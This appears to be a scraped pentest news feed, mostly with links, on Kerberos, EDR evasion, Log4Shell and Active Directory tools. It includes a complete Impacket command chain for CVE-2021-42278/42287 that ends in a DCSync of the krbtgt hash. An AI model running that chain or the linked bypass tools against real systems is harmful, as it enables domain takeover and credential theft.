Downgrading Kerberos Encryption & Why It Doesn’t Work In Server 2019
How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019.
https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/
#kerberos #windows2019 #pentest
How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019.
https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/
#kerberos #windows2019 #pentest
MAL-CL — Malicious Command-Line
MAL-CL aims to collect and document real world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team.
https://github.com/3CORESec/MAL-CL
#windows #cli #detection #blueteam #redteam
MAL-CL aims to collect and document real world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team.
https://github.com/3CORESec/MAL-CL
#windows #cli #detection #blueteam #redteam
Process Ghosting — EDR Evasion
The technique Process Herpaderping attempts to perform evasion by performing modification of the file (image tampering) which creates the process on a windows system. Deleting also the file during the creation of the process can have the same results. Even though some endpoint products have mature over the years and are able to detect complex threats organizations should constantly test the capabilities of their solution and should find alternate methods of detection even for the same technique.
https://pentestlaboratories.com/2021/12/08/process-ghosting/
#av #evasion #process #redteam #blueteam
The technique Process Herpaderping attempts to perform evasion by performing modification of the file (image tampering) which creates the process on a windows system. Deleting also the file during the creation of the process can have the same results. Even though some endpoint products have mature over the years and are able to detect complex threats organizations should constantly test the capabilities of their solution and should find alternate methods of detection even for the same technique.
https://pentestlaboratories.com/2021/12/08/process-ghosting/
#av #evasion #process #redteam #blueteam
Pentest Laboratories
Process Ghosting
Understanding how endpoint products work to identify malicious actions can lead to the discovery of security gaps which can be used for evasion during red team operations. The technique Process Her…
ipsourcebypass
This Python script can be used to bypass IP source restrictions using HTTP headers.
https://github.com/p0dalirius/ipsourcebypass
#ip #header #bypass #bugbounty
This Python script can be used to bypass IP source restrictions using HTTP headers.
https://github.com/p0dalirius/ipsourcebypass
#ip #header #bypass #bugbounty
Example Reports
If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports)
https://github.com/nationalcptc/report_examples
If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports)
https://github.com/nationalcptc/report_examples
GitHub
GitHub - globalcptc/report_examples: Example reports from prior years of the Collegiate Penetration Testing Competition
Example reports from prior years of the Collegiate Penetration Testing Competition - globalcptc/report_examples
Log4j RCE — CVE-2021-44228
The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services.
# https://www.lunasec.io/docs/blog/log4j-zero-day/
# https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
# https://github.com/whwlsfb/Log4j2Scan
# https://github.com/Cybereason/Logout4Shell
#apache #log4j #cve #rce
The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services.
# https://www.lunasec.io/docs/blog/log4j-zero-day/
# https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
# https://github.com/whwlsfb/Log4j2Scan
# https://github.com/Cybereason/Logout4Shell
#apache #log4j #cve #rce
ldapconsole
It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes.
Features
— Authenticate with password
— Authenticate with LM:NT hashes
— Authenticate with kerberos ticket
https://github.com/p0dalirius/ldapconsole
#ldap #query #tools
It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes.
Features
— Authenticate with password
— Authenticate with LM:NT hashes
— Authenticate with kerberos ticket
https://github.com/p0dalirius/ldapconsole
#ldap #query #tools
GitHub
GitHub - p0dalirius/ldapconsole: The ldapconsole script allows you to perform custom LDAP requests to a Windows domain.
The ldapconsole script allows you to perform custom LDAP requests to a Windows domain. - p0dalirius/ldapconsole
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278)
Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name
This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller.
Example:
0. Create a сomputer account
# https://exploit.ph/more-samaccountname-impersonation.html
# https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
# https://www.geekby.site/2021/12/samaccountname-spoofing/
# https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
#ad #pac #s4u2self #windows #redteam
Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name
This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller.
Example:
0. Create a сomputer account
addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
1. Clear its SPNsaddspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
2. Rename the computer (computer -> DC)renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
3. Obtain a TGTgetTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
4. Reset the computer namerenameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
5. Bbtain a service ticket with S4U2self by presenting the previous TGTKRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
6. DCSync by presenting the service ticketKRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
# https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html# https://exploit.ph/more-samaccountname-impersonation.html
# https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
# https://www.geekby.site/2021/12/samaccountname-spoofing/
# https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
#ad #pac #s4u2self #windows #redteam
APT
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278) Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time…
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows)
Binary:
https://github.com/cube0x0/noPac
PowerShell:
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
#ad #pac #s4u2self #windows #redteam
Binary:
https://github.com/cube0x0/noPac
PowerShell:
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
#ad #pac #s4u2self #windows #redteam
ADenum
ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those weaknesses with Kerberos.
https://github.com/SecuProject/ADenum
#ad #ldap #kerberos #enumeration #tools
ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those weaknesses with Kerberos.
https://github.com/SecuProject/ADenum
#ad #ldap #kerberos #enumeration #tools
GitLab CI jobs unmasked passwords scanner
https://github.com/Whitespots-OU/gitlab-ci-secrets
#tools #secrets #devsecops
https://github.com/Whitespots-OU/gitlab-ci-secrets
#tools #secrets #devsecops
GitHub
GitHub - Whitespots-OU/gitlab-ci-secrets: Gitlab CI jobs stdout secrets finder
Gitlab CI jobs stdout secrets finder. Contribute to Whitespots-OU/gitlab-ci-secrets development by creating an account on GitHub.
log4hshell — Quick Guide
https://musana.net/2021/12/13/log4shell-Quick-Guide/
#log4j #waf #bypass #bugbounty
https://musana.net/2021/12/13/log4shell-Quick-Guide/
#log4j #waf #bypass #bugbounty
Cobalt-Clip
Cobalt-clip is clipboard addons for Cobalt Strike to interact with clipboard. With this you can dump, edit and monitor the content of clipboard.
https://github.com/DallasFR/Cobalt-Clip
#cobaltstrike #clipboard #dump
Cobalt-clip is clipboard addons for Cobalt Strike to interact with clipboard. With this you can dump, edit and monitor the content of clipboard.
https://github.com/DallasFR/Cobalt-Clip
#cobaltstrike #clipboard #dump
Data Masking Bash OneLiner
If you need to mask data from utilities such as Responder\Inveigh for your report, use the following command:
If you need to mask data from utilities such as Responder\Inveigh for your report, use the following command:
cat hash.txt | awk -F ":" '{print $1"::"$3":"$4":"substr($5,1,4)"***"substr($6,20,20)"***"substr($6,length($6)-8,8)}' | sort -u | sort -u -t : -k 1,1
The following command can be used to mask data HashCat output:cat hash-hashcat.txt | awk -F ":" '{print ($3"/")$1":"substr($7,1,2)"******"substr($7,length($7)-1,3)}' | sort -u
#report #mask #data #pentest